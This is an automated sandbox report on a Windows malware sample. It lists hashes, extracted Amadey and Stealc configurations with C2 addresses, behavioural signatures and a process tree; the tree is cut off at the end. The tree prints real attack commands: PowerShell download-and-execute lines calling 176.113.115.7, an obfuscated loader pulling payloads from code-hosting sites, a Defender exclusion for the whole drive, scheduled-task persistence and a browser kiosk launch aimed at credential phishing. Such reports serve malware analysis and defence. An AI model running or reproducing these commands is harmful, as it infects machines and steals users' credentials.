Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20250217-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09/03/2025, 02:33

General

  • Target

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe

  • Size

    1.9MB

  • MD5

    5b1dbccb1977e33fae7e0efa78e96b49

  • SHA1

    fd97d5e5080b0130e21f998ed33b47997dd87d84

  • SHA256

    c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77

  • SHA512

    62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8

  • SSDEEP

    49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++, first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs PowerShell and hides the display window.

  • Downloads MZ/PE file 9 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 58 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3420
      • C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
        "C:\Users\Admin\AppData\Local\Temp\c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe
            "C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3928
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4536
              • C:\Windows\SysWOW64\expand.exe
                expand Ae.msi Ae.msi.bat
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1836
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4844
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "opssvc wrsa"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5096
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4444
              • C:\Windows\SysWOW64\findstr.exe
                findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4440
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 789919
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3660
              • C:\Windows\SysWOW64\extrac32.exe
                extrac32 /Y /E Deviation.msi
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2056
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "Brian" Challenges
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3956
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                6⤵
                • System Location Discovery: System Language Discovery
                PID:988
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4200
              • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                Occupation.com q
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:4592
                • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3848
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    8⤵
                    • Accesses Microsoft Outlook profiles
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • outlook_office_path
                    • outlook_win_path
                    PID:5572
              • C:\Windows\SysWOW64\choice.exe
                choice /d y /t 5
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1556
          • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
            "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
            4⤵
            • Downloads MZ/PE file
            • Executes dropped EXE
            PID:1616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2188
            • C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe
              C:\Users\Admin\AppData\Local\Temp\micE72.tmp.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1544
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
              5⤵
              PID:3704
            • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
              "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c 67cc62a429f2f.vbs
                5⤵
                • Checks computer location settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:2420
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                  6⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4452
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[obfuscated base64 blob removed]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4444
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4308
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                        9⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4600
            • C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe
              "C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"
              4⤵
              • Executes dropped EXE
              PID:3572
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3524
            • C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe
              "C:\Users\Admin\AppData\Local\Temp\10147600101\1ecf164df8.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2436
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4164
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn uwTdvmajKke /tr "mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta" /sc minute /mo 25 /ru "Admin" /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4532
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\8dwYpKQXk.hta
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2096
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3020
                  • C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
                    "C:\Users\Admin\AppData\Local\TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:2084
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3356
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:956
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:948
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4116
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:5336
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5360
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:5520
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5536
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "3c8CRmaZk4n" /tr "mshta \"C:\Temp\hdsNTGt9F.hta\"" /sc minute /mo 25 /ru "Admin" /f
                5⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:5708
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\hdsNTGt9F.hta"
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:5732
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5808
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:1608
            • C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe
              "C:\Users\Admin\AppData\Local\Temp\10148360101\71c36a0ccc.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:7040
            • C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe
              "C:\Users\Admin\AppData\Local\Temp\10148370101\68174908c0.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3544
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                5⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:4564
            • C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe
              "C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:7032
              • C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe
                "C:\Users\Admin\AppData\Local\Temp\10148380101\a78102cae3.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:8108
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 800
                5⤵
                • Program crash
                PID:8116
            • C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe
              "C:\Users\Admin\AppData\Local\Temp\10148390101\5dfd273896.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:6228
              • C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe
                "C:\Users\Admin\AppData\Local\Temp\D85OAYSPRW6ZOQBEAL9BAA9T7.exe"
                5⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:6796
            • C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe
              "C:\Users\Admin\AppData\Local\Temp\10148400101\c8e0738fcd.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:6100
            • C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe
              "C:\Users\Admin\AppData\Local\Temp\10148410101\24fba0a6a6.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:7404
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:6264
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5004
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1468
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:7916
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:7608
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                5⤵
                  PID:7604
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    6⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:6412
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 27430 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3986eac7-0429-46d4-94cf-957976949368} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" gpu
                      7⤵
                        PID:6252
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2432 -prefsLen 28350 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e94b7647-94a4-4d0f-b03e-ba8b628c4834} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" socket
                        7⤵
                          PID:6408
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2820 -childID 1 -isForBrowser -prefsHandle 3136 -prefMapHandle 2868 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20d52cfe-0d19-4dfb-8153-beb9d30277db} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
                          7⤵
                            PID:5976
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2768 -childID 2 -isForBrowser -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 32840 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4982101d-6810-47f2-a09d-ac49dc1d71eb} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
                            7⤵
                              PID:7712
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4868 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4872 -prefsLen 32840 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6957ab6f-b778-4b4e-afdc-5d25e1586ca1} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" utility
                              7⤵
                              • Checks processor information in registry
                              PID:8508
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5296 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bbb3ff8-72f2-4965-9f2e-d9677e5ccd4c} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
                              7⤵
                                PID:8892
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 4 -isForBrowser -prefsHandle 5440 -prefMapHandle 5448 -prefsLen 27038 -prefMapSize 244658 -jsInitHandle 1184 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08199c5f-fb00-4ef7-94fd-09428b233649} 6412 "\\.\pipe\gecko-crash-server-pipe.6412" tab
                                7⤵
                                  PID:8904
                                • C:\Program Files\Mozilla Firefox\firefox.exe
